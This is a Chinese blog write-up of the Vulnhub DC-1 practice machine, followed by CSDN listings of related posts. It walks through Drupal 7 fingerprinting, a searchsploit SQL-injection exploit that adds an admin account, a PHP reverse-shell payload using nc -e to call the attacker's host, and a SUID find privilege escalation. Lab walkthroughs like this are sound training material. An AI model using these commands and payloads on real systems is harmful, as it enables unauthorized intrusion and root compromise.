【DC系列】DC-1靶机实战详细讲解

最新推荐文章于 2024-05-14 19:21:29 发布
最新推荐文章于 2024-05-14 19:21:29 发布
阅读量170 收藏 2
点赞数 1
分类专栏: 打靶机系列 文章标签: python linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131421957
版权

【DC系列01】DC-1靶机

DC-1下载地址:https://www.five86.com/downloads/DC-1.zip

首先收集信息进行ip扫描

nmap -sS -T4 192.168.197.0/24

image-20230627145511103

打开后是这个样子

image-20230627145556711

看到一个登陆窗口,但是不能爆破,连续爆破超过5次会被禁止登陆。

image-20230627150423726

利用Wappalyzer可以看出来这个web用的是一个Drupal 7的内容管理系统,我们可以去找针对这个的扫描器。

image-20230627150307537

经过不懈的寻找,发现了这个扫描器(droopescan)。

进入这个网站后寻找安装方法,发现可以利用pip安装。

我们就在kali中pip install droopescan安装

image-20230627150705777

image-20230627155557092

我们扫出来的版本是7.22-7.26,就可以去searchsploit drupal查找漏洞文件

image-20230627155915705

查找了这么多,我用的是34992这个sql注入命令文件,然后searchsploit -m 34992下载就好了

image-20230627160429553

这样就可以在数据库中添加自己的账号密码

image-20230627160634860

账号密码都是tang就进去了

image-20230627160802611

这个时候我们想的就是怎么做一个反弹shell

这里我们发现了flag3,点进去看看。

image-20230627161742753

这里发现了需要用到find命令的-exec去读取shadow文件(密码存放文件,密文),所以这里想到了可能等会儿需要破解密码。

image-20230627161823451

点击Edit,我们发现这里的格式只能输入HTML或者纯文本,我们需要研究研究怎么上传php或者python代码。

image-20230627162148162

经过寻找,在这里面发现一个PHP fillter,安装后就可以上传php代码了

image-20230627161214837

安装好后发现还是不能上传php文本,所以又反过来找到了这个Permissions

image-20230627161551238

进去后有个Use the PHP code text format没有勾选,这里我们勾选上。

image-20230627161614058

这里我们就可以上传PHP代码了,可以上传个木马做一个反弹shell。

image-20230627163150781

<?php system('nc -e /bin/bash 192.168.197.160 8888');?>

image-20230627164009695
kali上设置一个监听,网页刷新下shell就过来了。

image-20230627164038443

利用python代码可以看着好看点,能显示目录。

python -c "import pty;pty.spawn('/bin/bash')"

image-20230627164635697

在flag3里面提到了find命令,可能关键点是find命令

sudo -l看一下,然并卵,什么都没有

image-20230627164838267

我们可以利用另一个命令,这条命令的作用是查找普通账户下拥有root权限的文件。

这里我们找到了/usr/bin/find

find / -perm -u=s -type f 2>/dev/null

image-20230627164930149

/usr/bin/find /etc/passwd -exec '/bin/sh' \;

find中的参数 -exec  执行找到的文件,find后面的/bin是什么都可以,但一定要是Linux中有的。

这里我们就可以利用下面命令进行提权,这里就有人说了,为什么不是bash,因为bash文件的权限不够。

image-20230627165537731

image-20230627165515360

接下来就可以轻松拿旗了

image-20230627172525224

dumplings。
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-1靶场搭建及渗透实战详细过程(DC靶场系列
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
靶机DC-1 WP
m0_66638011的博客
05-11 1617
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
网络安全最全DC系列靶机1通关教程_dc1 靶机,2024年来看看网络安全的发展
最新发布
2401_84253089的博客
05-14 987
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5449
DC靶机系列渗透教程
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7884
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
【Vulnhub靶机DC-1(suid find提权)
过期的秋刀鱼
08-03 417
Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。22、根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5。找到了与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用。
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
dc-1靶机
qq_63267612的博客
09-28 1268
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupal,drupal有一些可以利用的漏洞进入msf。
DC-1靶机渗透复现(详细教程)
hqhhhh的博客
10-09 292
DC-1靶机渗透实战教学,非常详细!包学包会
Vulnhub系列DC1靶场详解
weixin_54960572的博客
08-09 309
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
DC-1渗透靶场实战速通版
saber的博客
12-01 867
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
DC-1靶机渗透
weixin_45349299的博客
01-03 318
title: DC-1靶机渗透详解tags: DC系列靶机categories: 学习笔记。
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2903
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
DC-1靶场详解
苏生要努力
03-12 2830
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
靶机DC-1攻略
weixin_43179779的博客
10-07 1127
dc-1靶机靶机攻略
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值